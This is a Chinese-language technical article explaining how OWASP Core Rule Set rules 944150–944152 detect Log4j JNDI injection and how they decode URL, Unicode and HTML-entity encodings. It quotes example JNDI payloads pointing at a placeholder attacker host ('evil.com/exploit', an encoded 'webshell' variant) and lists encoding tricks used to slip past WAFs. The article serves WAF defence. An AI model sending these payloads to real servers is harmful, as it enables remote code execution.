OWASP Core Rule Set 中 Log4j 规则对 Unicode 转义序列的处理机制分析

2025-06-30 16:31:20作者：农烁颖Land

在 OWASP Core Rule Set (CRS) 项目中，规则 944150、944151 和 944152 是针对 Log4j 漏洞（CVE-2021-44228）的重要防护措施。这些规则通过检测特定的攻击模式来防止远程代码执行攻击。本文将深入分析这些规则对包含 Unicode 转义序列的 JSON 数据的处理机制。

背景知识

Log4j 漏洞利用 JNDI 查找功能，攻击者可以通过构造特定的字符串（如 ${jndi:ldap://evil.com/exploit}）实现远程代码执行。CRS 通过正则表达式匹配这种模式来防御攻击。

在实际攻击中，攻击者会使用各种编码技术来绕过检测，包括：

URL 编码（如 %24 代替 $）
Unicode 转义序列（如 \u0024 代替 $）
HTML 实体编码（如 $ 代替 $）

规则处理流程分析

CRS 中的 Log4j 防护规则（944150-16、944151-16 和 944152-16）采用了多层解码策略：

URL 解码（urlDecodeUni）：处理标准的百分号编码（如 %24）和 IIS 特有的 %u 编码
JavaScript 解码（jsDecode）：处理 JavaScript 风格的 Unicode 转义序列（如 \u0024）
HTML 实体解码（htmlEntityDecode）：处理 HTML 实体编码（如 $）

关键发现

通过深入分析发现，当 JSON 数据中包含 Unicode 转义序列时（如 \u0025），实际的解码过程并非完全由 CRS 的转换函数完成：

JSON 解析器的预处理：大多数 JSON 解析器（如 yajl、yyjson）会在数据到达 WAF 规则前自动将 Unicode 转义序列转换为实际字符。例如：
- 输入：{"foo": "\u002524{jndi:ldap://evil.com/webshell}"}
- 解析后：{"foo": "%24{jndi:ldap://evil.com/webshell}"}
Web 服务器的预处理：某些 Web 服务器（如 Apache、Nginx）也会对请求数据进行预处理，进一步改变原始输入的形式。
多层解码的必要性：由于攻击者可能组合使用多种编码方式，CRS 采用多层解码策略确保能够检测各种变体攻击。

技术实现细节

URL 解码实现：
- 处理标准百分号编码（如 %24 → $）
- 处理 IIS 特有的 %u 编码（如 %u0024 → $）
- 处理加号编码（+ → 空格）
JavaScript 解码实现：
- 处理 \uXXXX 形式的 Unicode 转义序列
- 处理 \xXX 形式的十六进制转义
HTML 实体解码实现：
- 处理 &entity; 形式的命名实体
- 处理 &#XXX; 形式的数字实体